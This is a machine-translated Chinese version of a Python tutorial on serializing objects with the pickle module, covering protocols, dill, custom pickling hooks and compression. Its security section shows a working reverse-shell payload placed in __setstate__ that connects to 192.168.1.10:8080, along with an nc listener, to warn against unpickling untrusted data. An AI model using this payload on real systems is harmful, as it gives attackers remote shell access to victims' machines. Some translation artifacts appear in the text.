geekdoc-python-zh/docs/realpython/python-pickle-module.md

Python pickle 模块:如何在 Python 中持久化对象

原文：https://realpython.com/python-pickle-module/

*立即观看**本教程有真实 Python 团队创建的相关视频课程。和书面教程一起看，加深理解: 用 Python pickle 模块 序列化对象

作为开发人员，您有时可能需要通过网络发送复杂的对象层次结构，或者将对象的内部状态保存到磁盘或数据库中以备后用。为了实现这一点，您可以使用一个称为序列化的过程，由于 Python pickle 模块，该过程得到了标准库的完全支持。

在本教程中，您将学习:

• 对一个对象进行序列化和反序列化意味着什么
• 哪些模块可以用来序列化 Python 中的对象
• 哪些类型的对象可以用 Python pickle 模块序列化
• 如何使用 Python pickle模块序列化对象层次结构
• 当反序列化来自不可信来源的对象时，风险是什么

我们去腌制吧！

免费奖励: 掌握 Python 的 5 个想法，这是一个面向 Python 开发者的免费课程，向您展示将 Python 技能提升到下一个水平所需的路线图和心态。

Python 中的序列化

序列化过程是一种将数据结构转换成可以存储或通过网络传输的线性形式的方法。

在 Python 中，序列化允许您将复杂的对象结构转换成字节流，可以保存到磁盘或通过网络发送。你也可以看到这个过程被称为编组。取一个字节流并将其转换回数据结构的反向过程被称为反序列化或解组。

序列化可以用在许多不同的情况下。最常见的用途之一是在训练阶段之后保存神经网络的状态，以便您可以在以后使用它，而不必重新进行训练。

Python 在标准库中提供了三个不同的模块，允许您序列化和反序列化对象:

1. marshal 模块
2. json 模块
3. pickle 模块

此外，Python 支持 XML ，也可以用它来序列化对象。

marshal模块是上面列出的三个模块中最老的一个。它的存在主要是为了读写 Python 模块编译后的字节码，或者解释器导入一个 Python 模块时得到的.pyc文件。所以，尽管你可以使用marshal来序列化你的一些对象，但这并不推荐。

json模块是三个中最新的一个。它允许您使用标准的 JSON 文件。JSON 是一种非常方便且广泛使用的数据交换格式。

选择 JSON 格式有几个原因:它是人类可读的和语言独立的，它比 XML 更轻便。使用json模块，您可以序列化和反序列化几种标准 Python 类型:

• T2bool
• T2dict
• T2int
• T2float
• T2list
• T2string
• T2tuple
• T2None

Python pickle模块是在 Python 中序列化和反序列化对象的另一种方式。它与json模块的不同之处在于它以二进制格式序列化对象，这意味着结果不是人类可读的。然而，它也更快，并且开箱即用，可以处理更多的 Python 类型，包括您的自定义对象。

注意:从现在开始，你会看到术语picking和unpicking用来指用 Python pickle模块进行序列化和反序列化。

因此，在 Python 中有几种不同的方法来序列化和反序列化对象。但是应该用哪一个呢？简而言之，没有放之四海而皆准的解决方案。这完全取决于您的用例。

以下是决定使用哪种方法的三个一般准则:

1. 不要使用marshal模块。它主要由解释器使用，官方文档警告说 Python 维护者可能会以向后不兼容的方式修改格式。

2. 如果您需要与不同语言或人类可读格式的互操作性，那么json模块和 XML 是不错的选择。

3. Python pickle模块是所有剩余用例的更好选择。如果您不需要人类可读的格式或标准的可互操作格式，或者如果您需要序列化定制对象，那么就使用pickle。

Remove ads

在 Python pickle模块内部

Python pickle模块基本上由四个方法组成:

1. pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
2. pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
3. pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
4. pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)

前两种方法在酸洗过程中使用，另外两种在拆线过程中使用。dump()和dumps()之间唯一的区别是前者创建一个包含序列化结果的文件，而后者返回一个字符串。

为了区分dumps()和dump()，记住函数名末尾的s代表string是很有帮助的。同样的概念也适用于load()和loads():第一个读取一个文件开始拆包过程，第二个操作一个字符串。

考虑下面的例子。假设您有一个名为example_class的自定义类，它有几个不同的属性，每一个都是不同的类型:

• a_number
• a_string
• a_dictionary
• a_list
• a_tuple

下面的例子展示了如何实例化该类并处理该实例以获得一个普通的字符串。在 pickledd 类之后，您可以在不影响 pickle 字符串的情况下更改其属性值。然后，您可以在另一个变量中取消 pickle 字符串，恢复之前 pickle 类的精确副本:

# pickling.py
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(
    f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")

在上面的例子中，您创建了几个不同的对象，并用pickle将它们序列化。这会产生一个带有序列化结果的字符串:

$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'

This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}

酸洗过程正确结束，将整个实例存储在这个字符串中:b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'酸洗过程结束后，通过将属性a_dict设置为None来修改原始对象。

最后，将字符串拆成一个全新的实例。你得到的是从酸洗过程开始的原始对象结构的深层副本。

Python pickle模块的协议格式

如上所述，pickle模块是 Python 特有的，酸洗过程的结果只能由另一个 Python 程序读取。但是，即使您正在使用 Python，知道pickle模块已经随着时间的推移而发展也是很重要的。

这意味着，如果您已经使用特定版本的 Python 对一个对象进行了 pickle，那么您可能无法使用旧版本对其进行解 pickle。兼容性取决于您用于酸洗过程的协议版本。

Python pickle模块目前可以使用六种不同的协议。协议版本越高，Python 解释器就需要越新的版本来进行解包。

1. 协议版本 0 是第一个版本。不像后来的协议，它是人类可读的。
2. 协议版本 1 是第一个二进制格式。
3. 协议版本 2 在 Python 2.3 中引入。
4. Python 3.0 中增加了协议版本 3 。用 Python 2.x 是解不开的。
5. Python 3.4 新增协议版本 4 。它支持更广泛的对象大小和类型，是从 Python 3.8 开始的默认协议。
6. Python 3.8 新增协议版本 5 。它支持带外数据，并提高了带内数据的速度。

**注意:**新版本的协议提供了更多的功能和改进，但仅限于更高版本的解释器。在选择使用哪种协议时，一定要考虑到这一点。

为了识别您的解释器支持的最高协议，您可以检查pickle.HIGHEST_PROTOCOL属性的值。

要选择特定的协议，您需要在调用load()、loads()、dump()或dumps()时指定协议版本。如果你没有指定一个协议，那么你的解释器将使用在pickle.DEFAULT_PROTOCOL属性中指定的默认版本。

Remove ads

可选择和不可选择类型

您已经了解到 Python pickle模块可以序列化比json模块更多的类型。然而，并不是所有的东西都是可以挑选的。不可拆分对象的列表包括数据库连接、打开的网络套接字、正在运行的线程等。

如果你发现自己面对一个不可拆卸的物体，那么你可以做几件事情。第一种选择是使用第三方库，比如dill。

dill模块扩展了pickle的功能。根据官方文档，它可以让你序列化不太常见的类型，比如函数与产生、嵌套函数、 lambdas 等等。

为了测试这个模块，您可以尝试 pickle 一个lambda函数:

# pickling_error.py
import pickle

square = lambda x : x * x
my_pickle = pickle.dumps(square)

如果您试图运行这个程序，那么您将会得到一个异常，因为 Python pickle模块不能序列化一个lambda函数:

$ python pickling_error.py
Traceback (most recent call last):
 File "pickling_error.py", line 6, in <module>
 my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed

现在尝试用dill替换 Python pickle模块，看看是否有什么不同:

# pickling_dill.py
import dill

square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)

如果您运行这段代码，那么您会看到dill模块序列化了lambda而没有返回错误:

$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'

dill的另一个有趣的特性是它甚至可以序列化整个解释器会话。这里有一个例子:

>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()

在这个例子中，您启动解释器，导入一个模块，并定义一个lambda函数以及几个其他变量。然后导入dill模块并调用dump_session()来序列化整个会话。

如果一切顺利，那么您应该在当前目录中获得一个test.pkl文件:

$ ls test.pkl
4 -rw-r--r--@ 1 dave  staff  439 Feb  3 10:52 test.pkl

现在，您可以启动解释器的一个新实例，并加载test.pkl文件来恢复您的最后一个会话:

>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>

第一个globals().items()语句表明解释器处于初始状态。这意味着您需要导入dill模块并调用load_session()来恢复您的序列化解释器会话。

**注意:**在你用dill代替pickle之前，请记住dill不包含在 Python 解释器的标准库中，并且通常比pickle慢。

即使dill比pickle允许你序列化更多的对象，它也不能解决你可能遇到的所有序列化问题。例如，如果您需要序列化一个包含数据库连接的对象，那么您会遇到困难，因为即使对于dill来说，它也是一个不可序列化的对象。

那么，如何解决这个问题呢？

这种情况下的解决方案是将对象从序列化过程中排除，并在对象被反序列化后重新初始化连接。

您可以使用__getstate__()来定义酸洗过程中应包含的内容。此方法允许您指定您想要腌制的食物。如果不覆盖__getstate__()，那么将使用默认实例的__dict__。

在下面的例子中，您将看到如何用几个属性定义一个类，并用__getstate()__从序列化中排除一个属性:

# custom_pickling.py

import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)

在本例中，您创建了一个具有三个属性的对象。因为一个属性是一个lambda，所以这个对象不能用标准的pickle模块来拾取。

为了解决这个问题，您可以使用__getstate__()指定要处理的内容。首先克隆实例的整个__dict__,使所有属性都定义在类中，然后手动删除不可拆分的c属性。

如果您运行这个示例，然后反序列化该对象，那么您将看到新实例不包含c属性:

$ python custom_pickling.py
{'a': 35, 'b': 'test'}

但是，如果您想在解包时做一些额外的初始化，比如将被排除的c对象添加回反序列化的实例，该怎么办呢？您可以通过__setstate__()来实现这一点:

# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)

通过将被排除的c对象传递给__setstate__()，可以确保它出现在被取消拾取的字符串的__dict__中。

Remove ads

腌制物品的压缩

虽然pickle数据格式是对象结构的紧凑二进制表示，但是您仍然可以通过用bzip2或gzip压缩它来优化您的腌串。

要用bzip2压缩一个腌串，可以使用标准库中提供的bz2模块。

在下面的例子中，您将获取一个字符串，对其进行处理，然后使用bz2库对其进行压缩:

>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259

使用压缩时，请记住较小的文件是以较慢的进程为代价的。

Python pickle模块的安全问题

您现在知道了如何使用pickle模块在 Python 中序列化和反序列化对象。当您需要将对象的状态保存到磁盘或通过网络传输时，序列化过程非常方便。

然而，关于 Python pickle模块还有一件事你需要知道:它是不安全的。还记得__setstate__()的讨论吗？这个方法非常适合在解包时进行更多的初始化，但是它也可以用来在解包过程中执行任意代码！

那么，你能做些什么来降低这种风险呢？

可悲的是，不多。经验法则是永远不要解压来自不可信来源或通过不安全网络传输的数据。为了防止中间人攻击，使用hmac之类的库对数据进行签名并确保它没有被篡改是个好主意。

以下示例说明了解除被篡改的 pickle 会如何将您的系统暴露给攻击者，甚至给他们一个有效的远程外壳:

# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c
                  "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)

在这个例子中，拆包进程执行__setstate__()，它执行一个 Bash 命令来打开端口8080上的192.168.1.10机器的远程 shell。

以下是如何在您的 Mac 或 Linux 机器上安全地测试这个脚本。首先，打开终端并使用nc命令监听到端口 8080 的连接:

$ nc -l 8080

这将是攻击者终端。如果一切正常，那么命令似乎会挂起。

接下来，在同一台计算机上(或网络上的任何其他计算机上)打开另一个终端，并执行上面的 Python 代码来清除恶意代码。确保将代码中的 IP 地址更改为攻击终端的 IP 地址。在我的例子中，攻击者的 IP 地址是192.168.1.10。

通过执行此代码，受害者将向攻击者公开一个外壳:

$ python remote.py

如果一切正常，攻击控制台上会出现一个 Bash shell。该控制台现在可以直接在受攻击的系统上运行:

$ nc -l 8080
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

所以，让我再重复一遍这个关键点:不要使用pickle模块来反序列化来自不可信来源的对象！

Remove ads

结论

现在您知道了如何使用 Python pickle模块将对象层次结构转换成可以保存到磁盘或通过网络传输的字节流。您还知道 Python 中的反序列化过程必须小心使用，因为对来自不可信来源的东西进行拆包是非常危险的。

在本教程中，您已经学习了:

• 对一个对象进行序列化和反序列化意味着什么
• 哪些模块可以用来序列化 Python 中的对象
• 哪些类型的对象可以用 Python pickle 模块序列化
• 如何使用 Python pickle模块序列化对象层次结构
• 从不受信任的来源获取信息的风险是什么

有了这些知识，您就为使用 Python pickle模块持久化对象做好了准备。作为额外的奖励，您可以向您的朋友和同事解释反序列化恶意 pickles 的危险。

如果您有任何问题，请在下面留下评论或通过 Twitter 联系我！

立即观看本教程有真实 Python 团队创建的相关视频课程。和书面教程一起看，加深理解: 用 Python pickle 模块 序列化对象***